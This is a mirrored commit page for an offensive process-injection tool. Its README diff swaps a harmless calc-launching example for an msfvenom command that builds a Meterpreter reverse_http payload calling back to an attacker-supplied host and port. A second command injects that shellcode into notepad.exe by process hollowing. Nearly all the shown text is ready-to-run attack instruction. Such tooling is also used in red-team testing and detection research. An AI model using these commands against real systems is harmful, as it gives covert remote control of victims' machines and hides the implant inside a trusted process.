mirror of
https://github.com/3xpl01tc0d3r/ProcessInjection
synced 2026-06-06 15:14:27 +00:00
Process Hollowing Technique Added
This commit is contained in:
@@ -37,7 +37,7 @@ Currently the program accepts shellcode in 3 formats
|
||||
|
||||
Process Hollowing
|
||||
Generating shellcode in c format and injecting it in the target process.
|
||||
msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f c
|
||||
msfvenom -p windows/meterpreter/reverse_http exitfunc=thread LHOST=<> LPORT=<> -b "\x00" -f c
|
||||
ProcessInjection.exe /ppath:""C:\Windows\System32\notepad.exe"" /path:""C:\Users\User\Desktop\shellcode.txt"" /f:c /t:3
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user